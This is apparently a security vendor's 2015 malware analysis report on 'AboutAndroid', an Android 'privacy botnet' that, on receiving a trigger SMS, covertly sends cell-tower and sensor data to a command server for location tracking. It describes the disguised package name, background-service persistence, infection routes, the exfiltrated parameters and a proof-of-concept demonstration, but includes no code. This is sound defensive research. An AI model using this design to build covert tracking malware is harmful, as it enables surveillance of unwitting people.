Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 

Meet the potnet - AboutAndroid | Malware Analysis Report

  • 1. Meet the Potnet Next generation Privacy botnet AboutAndroid | Malware Analysis Report Eran Goldstein Senior Cyber Security & Malware Researcher at ZIMPERIUM
  • 2. GENERAL NOTES: THE FOLLOWING INFORMATION SUMMERAIZE “POTNETS AND NEXT GENERATION BOTNET TECHNIQUES” RESEARCH PROCESS AND CONTAINS SENSITIVE INFORMATION. THIS PAPER ANALYZES IN DETAILS THE “ABOUTANDROID” ANDROID MALWARE AND BRINGS EVIDENCE THAT MOBILE DEVICES WILL GET MORE AND MORE INFECTED IN A NEAR FUTURE, LEVERAGING SYSTEMS ALREADY USED ON THE FIXED SIDE. WARNING: ABOUTANDROID IS A THREAT FOR BOTH USERS AND ORGANIZATIONS AS IT EXPOSING CLIENT INTO A PRIVACY ISSUES. ALL THE TOOLS AND APPLICATIONS THAT WILL BE DEMONSTRATE IN THIS DOCUMENT DEVELOPED FOR RESEARCH PURPOSES ONLY, IT IS STRONGLY RECOMMENDED THAT YOU DO NOT USE THIS TOOL FOR ILLEGAL PURPOSES. ALL RIGHTS OF THE KEYWORDS “POTNET” AND “POTNETS” AND THEIR DEFINITION ARE REGISTERED AND RESERVED TO THE AUTHOR OF THIS MANUAL. CLARIFICATION: WE WILL NOT BE RESPONSIBLE FOR ANY DAMAGE THAT CAUSED BY USING THE TOOLS, APPLICATION OR TECHNIQUES THAT DEMONSTRATED.
  • 3. Table of Contents Contents Introduction............................................................................................................................................................4 The next generation of privacy botnet...................................................................................................................5 Suspicious Activity ..................................................................................................................................................6 Analysis ...................................................................................................................................................................7 Malware Sample.............................................................................................................................................8 Infection..........................................................................................................................................................9 Operation......................................................................................................................................................10 Command and Control (C&C) .......................................................................................................................11 Network Impact............................................................................................................................................12 Proof-of-Concept ..................................................................................................................................................13 Conclusions...........................................................................................................................................................16
  • 4. Introduction Cyber Security researchers discovered a new techniques and methodology of privacy botnet that allows an attacker to gain user’s personal information, detailed location, movement and motion surveillance, area mapping and more. The malware found was designed to work in a stealth mode and running as a receiver behind a system background service. Once the attacker sends an SMS message containing different message body texts (For example: question mark or smiley) to the target device, it will cause the device to send a private information that not required any special permission or dialog's box approval from the victim client. The core functionality and the real advantage of the potnet (or privacy botnet), from an attacker's point of view, is the ability to get different type of data from the victim's device including: cellular network information and other sensor data of the targeted victim. The malware allows an attacker to get an information about the geolocation and the positioning of the target device. This data is calculated on the potnet C&C server and then available to the attacker in order to track the target device's exact motions. Diagram 1.0: Human tracking system
  • 5. Next generation of privacy botnet Potnet and The Next generation of privacy's botnets are not acting as a banking Trojan or malware and it is not designed to steal your banking credentials, log into your account or transfer your funds to criminals, is the type of malware that’s designed to track your motion, movement and geolocation, so that they can be used for social engineering, advanced positioning and tracking techniques. The Potnet's malware that found essentially doing this by grabbing the victim’s information and send it to certain websites. These websites are pre-specified by the attackers, and they are typically Command and Control (C&C) servers that hosted anonymously in a third-party web hosting service. The data that is collected, then calculated on the server side in order to provide to the attacker an accurate picture about the victim. Utilizing a short processing time on the client side of the malware, data sent to the server minimized, thus reducing the possibility of detection by client side’s defense mechanisms. Using a non-conventional device data allow the attacker to track victims that located at low- connectivity or bad-signal environments like inside buildings and even underground level (according to the cellular data signal). Diagram 1.1: Tracking victims in low-connectivity or bad-signal environments
  • 6. Suspicious Activity In the next example we are going to explain the suspicious activities of a potnet's malware by code implementation and demonstration of the AboutAndroid.apk malware. The AboutAndroid malware takes the advantage of perfectly legitimate data that can be read without the need for any special permission or dialog approval from the client side, what makes the detection process of potnet's malware to quite difficult. The AboutAndroid malware that analyzed suspicious to the following symptoms and running activities: 1. Ability to obtain a private data from the system without any prior information and without the user’s approval. 2. Ability to obtain a private data from the system without any prior information and without any special permission. 3. Responsible for high energy consumption of the battery. One of the harmful aspects of the potnet's malware family is that when it enters into the target mobile device, it is very difficult to be detected or to know the exact trigger that used in order to send an information or data out from the device. Diagram 1.2: The Cell tower (cellid), Cellphone and the signal
  • 7. Analysis AboutAndroid malware, logs the user’s sensors and cellular network data. Once executed, the malware generates an incoming broadcast receiver and then waits for a specific SMS text message that contains smiley or question mark as the message text body for example. Once the SMS message arrived, the malware then logs all activities related to a specific sensor data and the cellular network information include the cell id, LAC, MNC, MCC, etc.… and sending them to the potnet C&C server. Sending only a small amount of data to the C&C server at the backend reduces the possibility of detection by client side’s defense mechanisms (like Anti-Viruses or other signature-based protection techniques). This methodology and technique of calculating additional information that related to the victim by correlating the collected data with third-party APIs and other web-services are one of the advantages of potnets and the next generation botnets. Despite of the fact that this kind of attack must use a strong social engineering lure in order to convince the user to click on a malicious link or hope that the user will be tricked into installing an app. Once this is done, the AboutAndroid malware will stay persistent on the victim device and can be triggered via SMS message. Diagram 1.3: Triangulation is calculated according to the signal of every base-station (cell tower)
  • 8. Malware Sample The diagram below shows the report of an AboutAndroid malware sample that scanned using the VirusTotal service by 56 different antivirus engines and found as clean. In an attempt to looks as not malicious software the AboutAndroid malware is using the namespace of “com.google.aboutandroid”. Diagram 1.4: VirusTotal scan report
  • 9. Infection Infection of AboutAndroid can be done in different ways. For example, phishing spam can be used to lure the victim to an infected web site, where an embedded <iframe> causes the browser to automatically download a file called AboutAndroid.apk (or any other file). The user must then install it by clicking on the downloaded file and follow the manual installation process. Other techniques can be implemented by using mobile application markets, 3rd party websites or Trojan-Downloaders. Trojan-Downloaders are often distributed as part of the payload of another malware, such as a Trojan-Dropper. Trojan-Downloaders may also be distributed as a file attachment to spam e-mails, you get an e-mail that seems to come from a high-profile company with an attached invoice (for example) in the form of a .doc or a .pdf document. The invoice looks innocuous enough, but here's the catch: It can run a PDF reader exploits or macros in Microsoft Word in order to install the malware. Once installed, there is no application icon on the screen or any user interface to interact with. This is because our malware has installed itself as a background service that only start when the screen is unlocked by the user or when the device is re-booted. The malware service listens for the ON_BOOT or USER_PRESENT intents. The only evidence that the malware is installed is through the “Manage Applications” section of “Settings”. This will show that an application called “com.google.aboutandroid” is running. You can get rid of the infection by uninstalling the application. Diagram 2.0: Installation of AboutAndroid Malware POC
  • 10. Operation When the malware’s service starts, it registers a broadcast receiver in the background service and a SensorEventListener. Diagram 2.1: The malware register a sensor event listener Once SMS message that contains ":-)" as body text arrived to the device, the app logs the infected device’s sensor values and cellular network's information and then opens up a TCP connection to the primary potnet C&C server. Diagram 2.2: check if the SMS message contains ":-)" as body text
  • 11. Command and Control (C&C) Despite of the fact that a fairly simple command and control protocol is used to send data over an HTTP connection. The potnet C&C Server compensates and predominantly used to access different API and web services in order to calculate additional information about the physical environment of the victim device and perform a triangulation of the cellid and neighbors network information. Diagram 2.3: The C&C server’s IP address In addition, In order to translate the victim device data into an accurate motion tracking’s valuable information, the C&C server is performing a geometric calculation that correlated with the sensor data that collected. Diagram 2.4: Assign the parameter values and prepare the http request to the C&C server The sensors' data that's collected contains data from more than 7 different sensors includes Barometer Sensor, Proximity Sensor, Linear Acceleration Sensor, Gyroscope Sensor, Temperature Sensor, Gravity Sensor, Light Sensor and more.
  • 12. Network Impact In the diagram below we can see the HTTP request that arrives from the victim device and intercepted in our burp proxy. We can observe the different parameters that the app sending, For example: client = the client mobile device phone number. cid = the cell id that the mobile device connected to. lac = Local Area Code of the cellular network provider. mnc = Network Code of the cellular base station antenna provider. mcc = Country Code of the cellular base station antenna. signal = the signal of the mobile device from the cellular base station antenna (in dBm). cell_lon = the longitude of the cellular base station antenna (Before triangulation). cell_lat = the latitude of the cellular base station antenna (Before triangulation). Diagram 2.5: Intercepting the request from the victim device to the C&C server
  • 13. Proof-of-Concept After we launched one of the malware’s hidden intent (activity - not the main one) we can see how it looks at the diagram below. AboutAndroid Malware POC installed on the victim device and we are ready to begin with our simple scenario. Diagram 3.0: AboutAndroid Malware POC – an activity intent launched (not in hidden mode) 1. In order to track the victim, the attacker sends an SMS message with the text of “” to the victim device. Diagram 3.1: The attacker is sending the SMS message
  • 14. 2. The victim gets the SMS message Diagram 3.2: No suspicious activities on the victim device Diagram 3.3: The victim device getting the SMS message 3. The attacker is able now to browse to the AboutAndroid potnet C&C server GUI console and to get all the relevant and valuable information about the victim. Diagram 3.4 AboutAndroid potnet C&C server – part 1: basic information, indicators and the Motion Detection module We can’t observe any suspicious activity on the victim device
  • 15. In diagram 3.4 we can see that the basic information about our victim includes: Cellular network information, Radio signal related data, the calculation of the device location, “Inside building” indicator, Floor level indicator, etc.… In addition, we can see the Motion Detection module (at the right bottom corner). The Motion Detection module still showing us every exact motion of the victim device, triggered by any new movement of our human target. TIP: It is recommended to search on the internet for the full scenario's movie clip of this proof of concept demonstration in order to see the full features list of this AboutAndroid malware. In diagram 3.5 we can see the calculated data of the victim include triangulation data, base-station measurements and the estimated location of the victim device. Diagram 3.5 AboutAndroid potnet C&C server – part 2: calculated data of the victim
  • 16. Conclusions It seems that running a standard antivirus sweep will not get rid of AboutAndroid or other potnet’s malwares and since the program doesn't really make its presence known, you may be in trouble if you find that you're already infected with it. If you think you may have become infected by potnet malware, YOU should uninstall any suspicious app that you are not familiar with, otherwise wipe your device and perform a “Factory reset”. In my opinion, potnet malware trying to get an advantage of a victim device by implementation of an incoming broadcast receiver, sensors listeners and other non-conventional techniques’ data, what allows the malware to run in a quite stealth mode as well to get an information from the victim device without any user's interruption or the need for dialog's approval from the client’s side. The AboutAndroid malware runs in the background as a service and its operation is not noticeable to the user. However, it will likely consume considerable battery power when active, which will raise suspicions. On the other hand, users with a capped data plan will not notice to almost any charges changes on their bill. Once a specific app has been detected and signed, most mobile anti-virus products will be able to detect and remove the threat by uninstalling the malicious app. Notes for Android Developers and Google Security Team Giving applications direct access to hardware is dangerous. It is better if permissions will need to address sensor access. In addition, hardware should not provide more than what applications require and provide only an abstractions, not raw data.
  • 17. http://www.zimperium.com www.zimperium.com, ZIMPERIUM and Zimperium logo are trademarks of ZIMPERIUM Inc. All other trademarks are the property of their respective owners. The information presented is subject to change without notice. ZIMPERIUM assumes no responsibility for inaccuracies contained herein. Copyright © 2015 ZIMPERIUM Inc. All rights reserved.